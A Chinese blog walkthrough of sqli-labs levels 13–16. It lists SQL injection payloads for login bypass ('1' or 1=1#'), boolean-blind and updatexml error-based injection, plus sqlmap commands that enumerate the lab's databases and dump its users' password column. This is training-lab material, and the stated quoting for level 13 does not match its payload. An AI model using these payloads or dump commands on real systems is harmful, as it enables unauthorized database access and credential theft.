sqli-labs通关攻略(13-16)

less-13

在上下框输入',发现都有报错,可能存在回显点。

闭合方式为"),同样使用布尔盲注解决

1' and length(database())>7)#

less-14

输入双引号出现报错,判断可能存在回显点

闭合方式为"#。

1" and updatexml(1,concat(1,(select database())),2)#

less-15

输入下面代码后显示登录成功

1' or 1=1#

经过判断闭合方式为单引号,但是没有回显位,使用布尔盲注

1' or length(database())>7#

依次判断数据库字母即可

less-16

1") or 1=1#

输入后显示登录成功,和上题一样操作即可

1") or length(database())>7#

使用sqlmap通关sqli - labs可按如下方法与步骤操作: #### 确定目标URL和请求参数 依据不同关卡,明确目标URL以及对应的请求参数。例如,在第14关,目标URL为 `http://192.168.2.16/sqli-labs/Less-14/`,请求参数为 `uname=1&passwd=1&submit=Submit`;在第8关,目标URL是 `http://192.168.106.129/sqli-labs-master/Less-8/?id=1` ;在Less - 1下目标URL是 `http://localhost:8888/Less-1/?id=1`[^1][^4][^5]。 #### 调用sqlmap并设置参数 利用不同的参数来开展各种操作,以下是常见操作及对应的示例命令: ##### 探测数据库名 运行 `sqlmap -u <目标URL> --batch --dbs` 来获取所有数据库名。如第20关,可使用 `sqlmap -url "http://192.168.0.107/sqli-labs/Less-20/index.php" --cookie="uname=dhakkan" --batch --dbs --data="uname=Dhakkan&passwd=1&submit=Submit" --level=3 --risk=3"` 命令 [^2]。 ##### 获取指定数据库中的数据表名 执行 `python sqlmap.py -u <目标URL> --batch -D <数据库名> --tables` 命令。例如,获取 `security` 数据库中的数据表名,可使用 `python sqlmap.py -u http://192.168.106.129/sqli-labs-master/Less-8/?id=1 --batch -D security --tables` [^4]。 ##### 查找指定表下的所有字段 使用 `python sqlmap.py -u <目标URL> -D "<数据库名>" -T "<表名>" --columns` 命令。例如,爆出 `users` 表下的所有字段,可运行 `python sqlmap.py -u http://localhost:8888/Less-1/?id=1 -D "security" -T "users" --columns` [^5]。 ##### 爆字段内容 执行 `sqlmap -u <目标URL> --batch --thread=5 -D <数据库名> -T <表名> -C <字段名> --dump` 命令。例如,爆 `security` 数据库中 `users` 表的 `password` 字段内容,命令为 `sqlmap -u http://192.168.79.1/sqli-labs/Less-1?id=1 --batch --thread=5 -D security -T users -C password --dump` [^3]。 实例代码如下: ```bash # 探测数据库sqlmap -u http://192.168.0.107/sqli-labs/Less-20/index.php --cookie="uname=dhakkan" --batch --dbs --data="uname=Dhakkan&passwd=1&submit=Submit" --level=3 --risk=3 # 获取指定数据库中的数据表名 python sqlmap.py -u http://192.168.106.129/sqli-labs-master/Less-8/?id=1 --batch -D security --tables # 查找指定表下的所有字段 python sqlmap.py -u http://localhost:8888/Less-1/?id=1 -D "security" -T "users" --columns # 爆字段内容 sqlmap -u http://192.168.79.1/sqli-labs/Less-1?id=1 --batch --thread=5 -D security -T users -C password --dump ``` ###
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值